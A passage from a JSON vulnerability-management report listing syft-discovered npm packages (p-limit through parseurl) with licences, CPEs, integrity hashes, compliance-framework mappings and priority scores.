"https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", "dependencies": { "p-try": "^2.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "6cbc6aaefd17b7fc", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: p-limit 3.1.0", "title": "p-limit 3.1.0", "description": "Package discovered: p-limit 3.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "bdf7b3073a60eac3", "name": "p-limit", "version": "3.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:p-limit:p-limit:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:p-limit:p_limit:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:p_limit:p-limit:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:p_limit:p_limit:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:p:p-limit:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:p:p_limit:3.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/p-limit@3.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", "dependencies": { "yocto-queue": "^0.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "16add8edeff36c6a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: p-locate 4.1.0", "title": "p-locate 4.1.0", "description": "Package discovered: p-locate 4.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "ee16619fa3035ca6", "name": "p-locate", "version": "4.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:p-locate:p-locate:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:p-locate:p_locate:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:p_locate:p-locate:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:p_locate:p_locate:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:p:p-locate:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:p:p_locate:4.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/p-locate@4.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", "dependencies": { "p-limit": "^2.2.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "94f4f30dde8856c2", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: p-try 2.2.0", "title": "p-try 2.2.0", "description": "Package discovered: p-try 2.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "ee061a11e32e10c1", "name": "p-try", "version": "2.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:p-try:p-try:2.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:p-try:p_try:2.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:p_try:p-try:2.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:p_try:p_try:2.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:p:p-try:2.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:p:p_try:2.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/p-try@2.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8f14c9999630c748", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: package-json-from-dist 1.0.1", "title": "package-json-from-dist 1.0.1", "description": "Package discovered: package-json-from-dist 1.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "d82606f27243dac6", "name": "package-json-from-dist", "version": "1.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BlueOak-1.0.0", "spdxExpression": "BlueOak-1.0.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:package-json-from-dist:package-json-from-dist:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:package-json-from-dist:package_json_from_dist:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:package_json_from_dist:package-json-from-dist:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:package_json_from_dist:package_json_from_dist:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:package-json-from:package-json-from-dist:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:package-json-from:package_json_from_dist:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:package_json_from:package-json-from-dist:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:package_json_from:package_json_from_dist:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:package-json:package-json-from-dist:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:package-json:package_json_from_dist:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:package_json:package-json-from-dist:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:package_json:package_json_from_dist:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:package:package-json-from-dist:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:package:package_json_from_dist:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/package-json-from-dist@1.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz", "integrity": "sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "09093ffb9ed76376", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: pako 0.2.9", "title": "pako 0.2.9", "description": "Package discovered: pako 0.2.9", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "7762d448aa187997", "name": "pako", "version": "0.2.9", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "(MIT AND Zlib)", "spdxExpression": "(MIT AND Zlib)", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] }, { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:pako:pako:0.2.9:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/pako@0.2.9", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/pako/-/pako-0.2.9.tgz", "integrity": "sha512-NUcwaKxUxWrZLpDG+z/xZaCgQITkA/Dv4V/T6bw7VON6l1Xz/VnrBqrYjZQ12TamKHzITTfOEIYUj48y2KXImA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d21476c4aa5bcc9d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: pako 1.0.11", "title": "pako 1.0.11", "description": "Package discovered: pako 1.0.11", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "8811cee431746c6d", "name": "pako", "version": "1.0.11", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "(MIT AND Zlib)", "spdxExpression": "(MIT AND Zlib)", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:pako:pako:1.0.11:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/pako@1.0.11", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/pako/-/pako-1.0.11.tgz", "integrity": "sha512-4hLB8Py4zZce5s4yd9XzopqwVv/yGNhV1Bl8NTmCq1763HeK2+EwVTv+leGeL13Dnh2wfbqowVPXCIO0z4taYw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b50b24498bc5a2c6", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: parse-svg-path 0.1.2", "title": "parse-svg-path 0.1.2", "description": "Package discovered: parse-svg-path 0.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "7c5d21eaeee09ad2", "name": "parse-svg-path", "version": "0.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:parse-svg-path:parse-svg-path:0.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:parse-svg-path:parse_svg_path:0.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:parse_svg_path:parse-svg-path:0.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:parse_svg_path:parse_svg_path:0.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:parse-svg:parse-svg-path:0.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:parse-svg:parse_svg_path:0.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:parse_svg:parse-svg-path:0.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:parse_svg:parse_svg_path:0.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:parse:parse-svg-path:0.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:parse:parse_svg_path:0.1.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/parse-svg-path@0.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/parse-svg-path/-/parse-svg-path-0.1.2.tgz", "integrity": "sha512-JyPSBnkTJ0AI8GGJLfMXvKq42cj5c006fnLz6fXy6zfoVjJizi8BNTpu8on8ziI1cKy9d9DGNuY17Ce7wuejpQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "09bae738f1e39a33", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: parseley 0.12.1", "title": "parseley 0.12.1", "description": "Package discovered: parseley 0.12.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "22f6c66ddf9c06f1", "name": "parseley", "version": "0.12.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:parseley:parseley:0.12.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/parseley@0.12.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/parseley/-/parseley-0.12.1.tgz", "integrity": "sha512-e6qHKe3a9HWr0oMRVDTRhKce+bRO8VGQR3NyVwcjwrbhMmFCX9KszEV35+rn4AdilFAq9VPxP/Fe1wC9Qjd2lw==", "dependencies": { "leac": "^0.6.0", "peberminta": "^0.9.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "37de8d05673d8403", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: parseurl 1.3.3", "title": "parseurl 1.3.3", "description": "Package discovered: parseurl 1.3.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "484c0b9a6084b4bb", "name": "parseurl", "version": "1.3.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": 